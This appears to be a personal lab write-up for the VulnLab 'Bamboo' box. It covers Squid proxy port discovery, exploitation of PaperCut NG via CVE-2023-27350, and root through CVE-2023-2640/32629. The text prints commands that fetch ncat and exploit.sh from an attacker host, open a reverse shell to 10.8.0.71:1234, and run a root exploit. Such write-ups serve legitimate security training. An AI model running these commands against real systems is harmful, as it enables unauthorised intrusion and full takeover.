BAMBOO-VL Notes

Here is my notes on BAMBOO box from VulnLab.
BAMBOO: 10.10.123.165

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 83b2627d9c9c1d1c438ce3e36a49f0a7 (ECDSA)
|_  256 cf48f5f0a6c1f5cbf865189543b4e7e4 (ED25519)
3128/tcp open  http-proxy Squid http proxy 5.2
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/5.2

#Usually, you can find a hidden service out of Squid proxy.

No robots.txt

Squid HTTP Proxy: #TCP port 3128 

https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid

https://www.rapid7.com/db/modules/auxiliary/scanner/http/squid_pivot_scanning

https://shuciran.github.io/posts/Squid-Proxy-(tcp-3128)/

https://benheater.com/proving-grounds-squid/

https://github.com/aancw/spose

curl --proxy http://10.10.123.165:3128 http://10.10.123.165

Proxychains + nmap: 

http 10.10.123.165 3128

┌──(root㉿kali)-[/home/kali/VULNLAB/BAMBOO/10.10.123.165]
└─# tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks5 127.0.0.1 1080
http 10.10.123.165 3128

proxychains nmap -sT -n -p- localhost

squidscan: 

https://github.com/puckiestyle/squidscan

export GO111MODULE=on

go mod tidy

Modify squidscan.go to the target. 

go build

┌──(root㉿kali)-[/home/kali/Kali-Tools/squidscan]
└─# ./squidscan
0 / 65535 [___________________________________________________________________________________________________________________________________________________________________________________________________________________] 0.00% ? p/s
Port 22 found!
9118 / 65535 [---------------------------->________________________________________________________________________________________________________________________________________________________________________________] 13.91% 338 p/s
Port 9174 found!
Port 9173 found!
9160 / 65535 [---------------------------->________________________________________________________________________________________________________________________________________________________________________________] 13.98% 338 p/s
Port 9195 found!
Port 9192 found!
10004 / 65535 [------------------------------->____________________________________________________________________________________________________________________________________________________________________________] 15.27% 361 p/s
Port 9191 found!


9118,9173,9174,9191,9192,9195

curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9173 -vv

curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9191 -vv   

curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9118 -vv

#Use foxyproxy for proxychains port of SQUID proxy (TCP 3128).

curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9191 -vv   #This is the one !

10.10.123.165:9191 = PaperCut NG 22.0

https://www.exploit-db.com/exploits/51391

┌──(root㉿kali)-[/home/kali/VULNLAB/BAMBOO/10.10.123.165]
└─# proxychains4 python3 51391.py
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Enter the ip address: 10.10.123.165
[proxychains] Strict chain  ...  10.10.123.165:3128  ...  10.10.123.165:9191  ...  OK
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://10.10.123.165:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://10.10.123.165:9191/app?service=page/Dashboa
rd

-AUTH BYPASS WORKS ! 


It's vulnerable to CVE-2023-27350 !

https://github.com/horizon3ai/CVE-2023-27350

┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c 'wget http://10.8.0.71'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  10.10.123.165:3128  ...  10.10.123.165:9191  ...  OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

-BLIND-RCE ! 

Convert it into a reverse-shell as usual:

┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c 'wget http://10.8.0.71/ncat -O /tmp/ncat'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  10.10.123.165:3128  ...  10.10.123.165:9191  ...  OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c 'chmod +x /tmp/ncat'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  10.10.123.165:3128  ...  10.10.123.165:9191  ...  OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c '/tmp/ncat -nv 10.8.0.71 1234 -e /bin/bash'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  10.10.123.165:3128  ...  10.10.123.165:9191  ...  OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

┌──(root㉿kali)-[/home/kali/VULNLAB/BAMBOO]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.123.165] 56298
whoami
papercut
id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)

USER-SHELL ! 

papercut@bamboo:~$ whoami
whoami
papercut
papercut@bamboo:~$ hostname
hostname
bamboo
papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}
 


PRIV ESC:

python3 -c 'import pty; pty.spawn("/bin/bash")'

papercut@bamboo:~/server$ pwd
pwd
/home/papercut/server

no sudo -l

no gcc

No /etc/crontab,/etc/crontab*, crontab -l and /etc/cron.d neither !

It's vulnerable to CVE-2023-2640-CVE-2023-32629 !

papercut@bamboo:/tmp$ wget http://10.8.0.71/exploit.sh -O exploit.sh
wget http://10.8.0.71/exploit.sh -O exploit.sh
--2024-11-18 17:32:48--  http://10.8.0.71/exploit.sh
Connecting to 10.8.0.71:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 558 [text/x-sh]
Saving to: ‘exploit.sh’

exploit.sh          100%[===================>]     558  --.-KB/s    in 0.009s

2024-11-18 17:32:48 (62.0 KB/s) - ‘exploit.sh’ saved [558/558]

papercut@bamboo:/tmp$ chmod +x exploit.sh
chmod +x exploit.sh
papercut@bamboo:/tmp$ ./exploit.sh
./exploit.sh
[+] You should be root now
[+] Type 'exit' to finish and leave the house cleaned
root@bamboo:/tmp# whoami
whoami
root
root@bamboo:/tmp# id
id
uid=0(root) gid=1001(papercut) groups=1001(papercut)

root@bamboo:/root# whoami
whoami
root
root@bamboo:/root# hostname
hostname
bamboo
root@bamboo:/root# pwd
pwd
/root
root@bamboo:/root# ls
ls
root.txt  snap
root@bamboo:/root# cat root.txt
cat root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}












Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
More posts

ATLAS-HTB Notes

ARTIFICIAL-HTB Notes

Learn Hacking By Examples

SLONIK-HTB Notes
